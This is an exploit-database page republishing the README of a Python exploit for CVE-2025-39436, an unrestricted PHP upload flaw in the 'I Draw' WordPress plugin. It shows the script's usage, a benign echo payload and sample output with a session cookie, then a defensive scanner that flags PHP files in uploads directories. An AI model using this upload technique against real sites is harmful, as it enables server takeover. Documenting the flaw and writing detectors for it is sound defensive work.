## https://sploitus.com/exploit?id=56F8949E-69E6-518C-8F8C-AA706442EBC6
# WordPress Plugin Exploit: CVE-2025-39436
## Description
An **Unrestricted Upload of File with Dangerous Type** vulnerability exists in the "I Draw" WordPress plugin. The plugin's upload handler does not restrict the type of file it accepts, so an attacker can upload a file of a dangerous type (such as a PHP script) and have the web server execute it. The issue impacts **I Draw versions up to 1.0**.
---
## Exploit Details
The exploit script logs in with the supplied WordPress credentials, sends a PHP file through the plugin's upload functionality, and then reports the URL under `wp-content/uploads` from which the server serves (and executes) it. Below is the default payload used, as defined in the Python script:
```python
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
```
---
## Usage
```bash
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD

options:
  -h, --help                 Show this help message and exit
  -u, --url URL              Target website URL
  -un, --username USERNAME   Username
  -p, --password PASSWORD
```
---
## Script Output Example
```plaintext
[+] Login successful.
[*] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[+] File uploaded successfully:
[*] http://target/wp-content/uploads/2025/4/19/nxploit.php
```
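The uploaded file lands under `wp-content/uploads`, a directory that should only ever hold media. The following scanner is an added example for defenders (not part of this exploit or the plugin): it walks an uploads tree and flags files that carry a PHP-executable extension anywhere in their name (catching `shell.php.jpg`-style double extensions) or that contain a PHP open tag despite an innocent extension. The sample tree it builds is constructed here to mirror the `2025/4/19/nxploit.php` path shown above; the extension list is an assumption about what a typical PHP-FPM/Apache setup will execute.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, Optional

# Extensions a typical PHP web server will execute (assumed list; adjust to your handler config).
EXECUTABLE_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}
# A PHP open tag near the start of a file betrays script content regardless of extension.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def is_suspicious(path: Path) -> Optional[str]:
    """Return a reason if this file should not live in an uploads directory, else None."""
    suffixes = [s.lower() for s in path.suffixes]  # "a.php.jpg" -> [".php", ".jpg"]
    if any(s in EXECUTABLE_EXTS for s in suffixes):
        return "executable extension " + "".join(suffixes)
    try:
        head = path.read_bytes()[:4096]
    except OSError:
        return None
    if PHP_TAG.search(head):
        return "PHP open tag in file content"
    return None


def scan_uploads(root: Path) -> Dict[str, str]:
    """Map each flagged file (relative, POSIX-style path) to the reason it was flagged."""
    findings: Dict[str, str] = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            reason = is_suspicious(p)
            if reason:
                findings[p.relative_to(root).as_posix()] = reason
    return findings


def build_sample_uploads() -> Path:
    """Constructed sample tree: one planted PHP file, one clean image, two disguised files."""
    root = Path(tempfile.mkdtemp(prefix="wp-uploads-"))
    day = root / "2025" / "4" / "19"
    day.mkdir(parents=True)
    (day / "nxploit.php").write_bytes(b"<?php echo 'test'; ?>")
    (day / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0JFIF")          # genuine-looking JPEG header
    (day / "photo.php.jpg").write_bytes(b"\xff\xd8\xff\xe0JFIF")      # double extension
    (day / "notes.txt").write_bytes(b"<?php echo 'hidden'; ?>")       # PHP behind a .txt name
    return root


if __name__ == "__main__":
    for rel, why in scan_uploads(build_sample_uploads()).items():
        print(f"[!] {rel}: {why}")
```

Run it against a real `wp-content/uploads` by passing that path to `scan_uploads`; any hit is worth investigating, since WordPress core never writes PHP there.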
---
## Disclaimer
This script is provided for **educational purposes only**. The author takes no responsibility for any misuse or damage caused by this exploit. Use it at your own risk.
---
*By: Nxploited ( Khaled Alenazi )*